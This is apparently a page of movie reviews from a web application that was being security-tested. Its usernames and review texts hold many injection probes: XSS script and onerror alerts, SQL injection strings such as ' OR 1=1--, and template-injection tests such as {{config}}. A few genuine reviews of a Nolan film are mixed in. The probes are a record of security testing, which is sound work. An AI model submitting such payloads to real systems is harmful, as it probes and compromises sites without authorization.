test (Dec 24, 2025 04:38 PM)
test
-
test (Dec 24, 2025 04:38 PM)
test
-
test (Dec 24, 2025 04:38 PM)
test
-
test (Dec 24, 2025 04:38 PM)
test
-
test (Dec 24, 2025 04:35 PM)
test
-
test (Dec 24, 2025 04:35 PM)
test
-
test (Dec 24, 2025 04:35 PM)
test
-
test (Dec 24, 2025 04:35 PM)
test
-
normal_user (Dec 24, 2025 04:21 PM)
Great' movie
-
normal_user (Dec 24, 2025 04:21 PM)
Normal content
-
test'user (Dec 24, 2025 04:21 PM)
Normal content
-
sqli_reviewer (Dec 24, 2025 04:21 PM)
Great movie!
-
non_numeric_test (Dec 24, 2025 03:57 PM)
Test review with non-numeric rating
-
non_numeric_test (Dec 24, 2025 03:57 PM)
Test review with non-numeric rating
-
non_numeric_test (Dec 24, 2025 03:57 PM)
Test review with non-numeric rating
-
non_numeric_test (Dec 24, 2025 03:57 PM)
Test review with non-numeric rating
-
non_numeric_test (Dec 24, 2025 03:57 PM)
Test review with non-numeric rating
-
multi_review_test_user (Dec 24, 2025 03:57 PM)
Second review - 1 star (should be prevented)
-
multi_review_test_user (Dec 24, 2025 03:57 PM)
First review - 5 stars
-
rating_test_10000 (Dec 24, 2025 03:57 PM)
Test review with rating 10000
-
rating_test_-999 (Dec 24, 2025 03:57 PM)
Test review with rating -999
-
rating_test_999 (Dec 24, 2025 03:57 PM)
Test review with rating 999
-
rating_test_100 (Dec 24, 2025 03:57 PM)
Test review with rating 100
-
rating_test_-5 (Dec 24, 2025 03:57 PM)
Test review with rating -5
-
rating_test_0 (Dec 24, 2025 03:57 PM)
Test review with rating 0
-
csrf_reviewer2 (Dec 24, 2025 03:53 PM)
CSRF test review - external origin
-
csrf_reviewer (Dec 24, 2025 03:53 PM)
CSRF test review - no referer
-
testuser_ssti (Dec 24, 2025 03:29 PM)
{{4*'y'}}
-
testuser_ssti (Dec 24, 2025 03:28 PM)
{{8*8}}
-
testuser_ssti (Dec 24, 2025 03:28 PM)
{{'hello'+'review'}}
-
testuser_ssti (Dec 24, 2025 03:28 PM)
{{'test_review'}}
-
testuser_ssti (Dec 24, 2025 03:28 PM)
Great movie!
-
testuser (Dec 24, 2025 03:10 PM)
{{7*'7'}}
-
testuser (Dec 24, 2025 03:09 PM)
{{7*7}}
- Test User (Dec 24, 2025 03:02 PM)
-
test (Dec 24, 2025 02:57 PM)
test' OR 1=1--
-
test' OR 1=1-- (Dec 24, 2025 02:57 PM)
test
-
testuser (Dec 24, 2025 02:57 PM)
Great movie!
- <script>alert('XSS_USER_BOTH')</script> (Dec 24, 2025 02:54 PM)
- testuser3 (Dec 24, 2025 02:54 PM)
-
testuser2 (Dec 24, 2025 02:54 PM)
- testuser (Dec 24, 2025 02:54 PM)
-
<img src=x onerror=alert('XSS_REVIEW_USER_IMG')> (Dec 24, 2025 02:54 PM)
Excellent!
-
<script>alert('XSS_REVIEW_USER')</script> (Dec 24, 2025 02:54 PM)
Great movie!
-
Sarah Johnson (Dec 24, 2025 02:38 PM)
Absolutely mind-bending! Christopher Nolan delivers a masterpiece that keeps you thinking long after the credits roll. The visual effects are stunning and the plot is incredibly intricate. Highly recommended for anyone who enjoys intelligent sci-fi.
-
Michael Anderson (Dec 23, 2025 09:11 PM)
Absolutely mind-blowing! Christopher Nolan has created a masterpiece that challenges our perception of reality. The visual effects are stunning, and the plot keeps you engaged from start to finish. A must-watch for any cinema enthusiast!
-
{{'XYZTEST'+'123ABC'}} (Dec 23, 2025 03:49 PM)
Test content
-
{{999*999}} (Dec 23, 2025 03:49 PM)
Test content
-
{{13*17}} (Dec 23, 2025 03:49 PM)
Test content
-
SSTITester (Dec 23, 2025 03:49 PM)
{{''.__class__}}
-
SSTITester (Dec 23, 2025 03:49 PM)
{{config}}
-
SSTITester (Dec 23, 2025 03:49 PM)
{{'SSTI'+'TEST'}}
-
SSTITester (Dec 23, 2025 03:49 PM)
{{7*'7'}}
-
SSTITester (Dec 23, 2025 03:49 PM)
{{7*7}}
-
{{''.__class__}} (Dec 23, 2025 03:49 PM)
Test review content
-
{{config}} (Dec 23, 2025 03:49 PM)
Test review content
-
{{'SSTI'+'TEST'}} (Dec 23, 2025 03:49 PM)
Test review content
-
{{7*'7'}} (Dec 23, 2025 03:49 PM)
Test review content
-
{{7*7}} (Dec 23, 2025 03:49 PM)
Test review content
-
TestUser1497 (Dec 23, 2025 03:48 PM)
">
- TestUser7732 (Dec 23, 2025 03:48 PM)
-
TestUser4041 (Dec 23, 2025 03:48 PM)
- TestUser6025 (Dec 23, 2025 03:48 PM)
- TestUser4290 (Dec 23, 2025 03:48 PM)
-
"><script>alert('XSS')</script> (Dec 23, 2025 03:48 PM)
Great movie!
-
<svg onload=alert('XSS')> (Dec 23, 2025 03:48 PM)
Great movie!
-
<img src=x onerror=alert('XSS')> (Dec 23, 2025 03:48 PM)
Great movie!
-
<script>alert(1)</script> (Dec 23, 2025 03:48 PM)
Great movie!
-
<script>alert('XSS')</script> (Dec 23, 2025 03:48 PM)
Great movie!
-
test (Dec 23, 2025 03:42 PM)
test
-
testuser (Dec 23, 2025 03:34 PM)
Test
-
testuser (Dec 23, 2025 03:34 PM)
'
-
' OR '1'='1 (Dec 23, 2025 03:34 PM)
Test
-
' (Dec 23, 2025 03:34 PM)
Test
-
testuser (Dec 23, 2025 03:34 PM)
Great movie!
-
TestUser4 (Dec 23, 2025 03:30 PM)
'">
-
'"><script>alert('StoredXSS')</script> (Dec 23, 2025 03:30 PM)
Great movie!
- TestUser3 (Dec 23, 2025 03:30 PM)
-
<svg onload=alert('StoredXSS')> (Dec 23, 2025 03:30 PM)
Great movie!
-
TestUser2 (Dec 23, 2025 03:30 PM)
-
<img src=x onerror=alert('StoredXSS')> (Dec 23, 2025 03:30 PM)
Great movie!
- TestUser1 (Dec 23, 2025 03:30 PM)
-
<script>alert('StoredXSS')</script> (Dec 23, 2025 03:30 PM)
Great movie!
-
Emily Watson (Dec 23, 2025 03:15 PM)
Absolutely brilliant film! The concept is mind-bending and the execution is flawless.
-
Sarah Johnson (Dec 20, 2025 10:50 AM)
Absolutely mind-blowing! Christopher Nolan's masterpiece keeps you on the edge of your seat. The concept of dreams within dreams is executed perfectly. Highly recommend!
-
bob (Oct 21, 2025 02:04 PM)
A solid 10/10 watch!
-
alice (Oct 21, 2025 02:04 PM)
Amazing visuals and story.